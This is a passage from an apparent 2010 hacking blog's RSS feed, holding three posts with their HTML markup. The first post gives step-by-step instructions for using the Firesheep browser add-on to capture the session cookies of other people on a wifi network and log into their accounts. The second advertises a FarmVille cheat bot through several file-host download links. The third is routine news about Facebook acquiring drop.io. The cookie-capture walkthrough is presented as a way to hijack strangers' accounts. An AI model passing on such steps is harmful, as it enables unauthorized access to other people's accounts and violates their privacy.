&lt;b&gt;1.&lt;/b&gt; First of all download&lt;b&gt; &quot;Firesheep&quot;&lt;/b&gt; from the above link and use the &lt;b&gt;&quot;openwith&quot;&lt;/b&gt; option in the firefox browser&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ5OKxp0G1KwqNqYDQpGloVKiA1jBSqnO2qTW-_pXGrQZ-qFUYewSYTXos7mnr4TEhLx4wWQA3DWKMyfzehmM5Of9nbBy75q_I4n4Xs_MDG7w45rhp9eJKA-zeYSTMdsYCSTCKomnnJI/s1600/untitled.bmp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJZ5OKxp0G1KwqNqYDQpGloVKiA1jBSqnO2qTW-_pXGrQZ-qFUYewSYTXos7mnr4TEhLx4wWQA3DWKMyfzehmM5Of9nbBy75q_I4n4Xs_MDG7w45rhp9eJKA-zeYSTMdsYCSTCKomnnJI/s1600/untitled.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;Once you have installed firesheep on firefox web browser, Click on &lt;b&gt;view&lt;/b&gt; at the top, then goto &lt;b&gt;sidebar&lt;/b&gt; and click on &lt;b&gt;Firesheep&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxEL4-3b6gBFgBkLdq-KweZL5mIOGMn1SxJyspZCZZfi-tsux2qcaYZObKm12rJsGiTHzoZniIca22skQ_ylKNeAN2ODZhw6ndxfc7LDe3Eq6U3fg3EbyPrgcku_7Kt5shprNK742p-YM/s1600/firesheep+4.bmp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxEL4-3b6gBFgBkLdq-KweZL5mIOGMn1SxJyspZCZZfi-tsux2qcaYZObKm12rJsGiTHzoZniIca22skQ_ylKNeAN2ODZhw6ndxfc7LDe3Eq6U3fg3EbyPrgcku_7Kt5shprNK742p-YM/s1600/firesheep+4.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt; Now click on the top left button &quot;&lt;b&gt;Start capturing&lt;/b&gt;&quot; and  it will start to capture the session cookies of people in your wifi  network, This will show you the list of those people whose cookies are  captured and have visited unsecured website known to firesheep, Double  click on the photo and you will be logged in instantly &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV-VqHNB8mfbiXzJwPhN1EqsPw4eRbS7xmCIdt8RiZOhGIj5nsr1R8a2sb0qeImXU8i7eS-Oty1UIW2aFdmgNw9mOqP-PgX6kqbx-5XNw22Ad4tMuLxIoJn8KxqlLsac_xVx-Qx1BuGe4/s1600/firesheep.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Firesheep&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV-VqHNB8mfbiXzJwPhN1EqsPw4eRbS7xmCIdt8RiZOhGIj5nsr1R8a2sb0qeImXU8i7eS-Oty1UIW2aFdmgNw9mOqP-PgX6kqbx-5XNw22Ad4tMuLxIoJn8KxqlLsac_xVx-Qx1BuGe4/s1600/firesheep.jpg&quot; /&gt;&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;
Hope you liked the post! Pass the comments</description><link>http://hackinverse.blogspot.com/2010/11/firesheep-makes-facebook-hacking-easy.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_u_FPbAGnpWc/TNjuC_xuexI/AAAAAAAAAI4/GXoAmFsJ_Mw/s72-c/Firesheep+1.jpeg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-7711699269390725185</guid><pubDate>Fri, 05 Nov 2010 12:35:00 +0000</pubDate><atom:updated>2010-11-07T21:26:40.624+05:30</atom:updated><title>Farm Ville Bot</title><description>&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: right; margin-left: 1em; text-align: right;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza9L0qPfYKDo6AeSoYR-TUudDOGYhAxCzmGr-xBzEJ3NLvkMwg44ppN4UdWHk6BmJ29QF2zUax5pjHSQ6FB3obTh3V_wlhQa2eUHFtsNlVSJ8wPd6rYQrD8o_96_lmDjGFuGhv1iWPmQ/s1600/19-582-1-gameBig_farmville%5B2%5D.jpg&quot; linkindex=&quot;23&quot; onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; style=&quot;clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;153&quot; id=&quot;BLOGGER_PHOTO_ID_5536835451193876834&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza9L0qPfYKDo6AeSoYR-TUudDOGYhAxCzmGr-xBzEJ3NLvkMwg44ppN4UdWHk6BmJ29QF2zUax5pjHSQ6FB3obTh3V_wlhQa2eUHFtsNlVSJ8wPd6rYQrD8o_96_lmDjGFuGhv1iWPmQ/s200/19-582-1-gameBig_farmville%5B2%5D.jpg&quot; style=&quot;float: left; margin: 0pt 10px 10px 0pt;&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Farmville &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;This is the Farm Ville Bot all of you are waiting for&lt;br /&gt;
For any more queries regarding its usage, just message me &lt;a href=&quot;http://www.facebook.com/home.php?#%21/profile.php?id=100001672909687&quot; linkindex=&quot;24&quot;&gt;in Facebook &lt;/a&gt;and &lt;a href=&quot;http://www.facebook.com/home.php?#%21/pages/Hackinverse/148307341880139&quot; linkindex=&quot;25&quot;&gt;visit the page&lt;/a&gt; and click LIKE on it&lt;br /&gt;
&lt;br /&gt;
It is absolutely free.&lt;br /&gt;
Don&#39;t forget to read the README File &lt;br /&gt;
Enjoy&lt;br /&gt;
:-) &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://rapidshare.com/files/428273439/Workin_BOT_v2.1.11_Sept_11_2010.rar&quot; linkindex=&quot;26&quot;&gt;Rapidshare Link&lt;/a&gt; &lt;a href=&quot;http://www.megaupload.com/?d=X9TZKC4H&quot; linkindex=&quot;27&quot;&gt;&lt;br /&gt;
Megaupload Link&lt;/a&gt; &lt;a href=&quot;http://hotfile.com/dl/79742103/4670559/Workin_BOT_v2.1.11_Sept_11_2010.rar.html&quot; linkindex=&quot;28&quot;&gt;&lt;br /&gt;
Hotfile Link&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/?6kjghupgm5ibb7q&quot; linkindex=&quot;29&quot;&gt;MediaFire Link&lt;/a&gt;</description><link>http://hackinverse.blogspot.com/2010/11/farm-ville-bot.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza9L0qPfYKDo6AeSoYR-TUudDOGYhAxCzmGr-xBzEJ3NLvkMwg44ppN4UdWHk6BmJ29QF2zUax5pjHSQ6FB3obTh3V_wlhQa2eUHFtsNlVSJ8wPd6rYQrD8o_96_lmDjGFuGhv1iWPmQ/s72-c/19-582-1-gameBig_farmville%5B2%5D.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-76777532996545911</guid><pubDate>Mon, 01 Nov 2010 10:01:00 +0000</pubDate><atom:updated>2010-11-01T18:15:19.406+05:30</atom:updated><title>SOFTW4R3 UPD4T3 FOR W33K #1</title><description>&lt;h3 class=&quot;post-title entry-title&quot; style=&quot;color: #333333; font-family: Verdana,Arial,sans-serif; font-size: 16px; font-weight: bold; line-height: 1.1em; margin: 0px; padding: 0px;&quot;&gt;&lt;p&gt;&lt;/p&gt;&lt;a href=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TM6R87I0hlI/AAAAAAAAAIU/FL8P4N7UK7U/s1600/images+%286%29.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;21&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/_u_FPbAGnpWc/TM6R87I0hlI/AAAAAAAAAIU/FL8P4N7UK7U/s1600/images+%286%29.jpg&quot; /&gt;&lt;/a&gt;Facebook bought drop.io - File sharing will be the next Facebook feature&lt;/h3&gt;&lt;div style=&quot;color: #333333; font-family: Verdana,Arial,sans-serif; font-size: 13px; line-height: 16px;&quot;&gt;Facebook number one social networking website bought drop.io and closing down file sharing service by 15th of December. Facebook is really good at sharing picture but not the media files. This will make them strong in real time file sharing as well.&lt;br /&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;display: inline;&quot;&gt;drop.io blog&amp;nbsp;announced that most their service and assets including Sam Lessin were bought by Facebook.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&quot;Today, we’re proud to announce that we’ve struck a deal with Facebook. What this means is that Facebook has bought most of&amp;nbsp;drop.io’s technology and assets, and Sam Lessin is moving to Facebook.&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;display: inline;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: #333333; font-family: Verdana,Arial,sans-serif; font-size: 13px; line-height: 1.3em; margin: 0px 0px 0.75em; text-align: center;&quot;&gt;&lt;a href=&quot;http://adf.ly/133192/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwPU7hnFtkcLugAMqMILYllmJ6GjfKPtKopz0Gtwt9LCAabVbUUv-1qQkAV7XJXyO50gzT12GqX_6W6EUSppvyj59m2XrzJu9zMLexSGLbK5dFLyRlMEc14KnpksG0-eM0Ah6aWM0i-mvO/s1600/dropiologo1.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;22&quot; style=&quot;clear: left; color: #336699; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwPU7hnFtkcLugAMqMILYllmJ6GjfKPtKopz0Gtwt9LCAabVbUUv-1qQkAV7XJXyO50gzT12GqX_6W6EUSppvyj59m2XrzJu9zMLexSGLbK5dFLyRlMEc14KnpksG0-eM0Ah6aWM0i-mvO/s1600/dropiologo1.jpg&quot; style=&quot;border: 1px solid rgb(255, 255, 255); padding: 4px;&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: Verdana,Arial,sans-serif; font-size: 13px; line-height: 16px;&quot;&gt;&lt;span class=&quot;fullpost&quot; style=&quot;display: inline;&quot;&gt;In the coming weeks, drop.in will be winding down the their service. As of this week, people will no longer be able to create new free drops, but you’ll be able to download content from existing drops until Dec. 15. Paid user accounts will still be available through Dec. 15 and paid users will be able to continue using the service normally. After Dec. 15, paid accounts will be discontinued as well.&lt;br /&gt;
&lt;br /&gt;
Please download your information before Dec. 15 – they plan to delete it after that time. No user data or content will be transferred to Facebook.&lt;br /&gt;
&lt;br /&gt;
Soon you will be able to experience similar services from Facebook. We are still not sure is it going to be a free service or a paid service or what exactly Facebook plans with drop.io&amp;nbsp;&lt;/span&gt;&lt;/span&gt;</description><link>http://hackinverse.blogspot.com/2010/11/softw4r3-upd4t3-for-w33k-1.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_u_FPbAGnpWc/TM6R87I0hlI/AAAAAAAAAIU/FL8P4N7UK7U/s72-c/images+%286%29.jpg" height="72" width="72"/><thr:total>0</thr:total></item></channel></rss>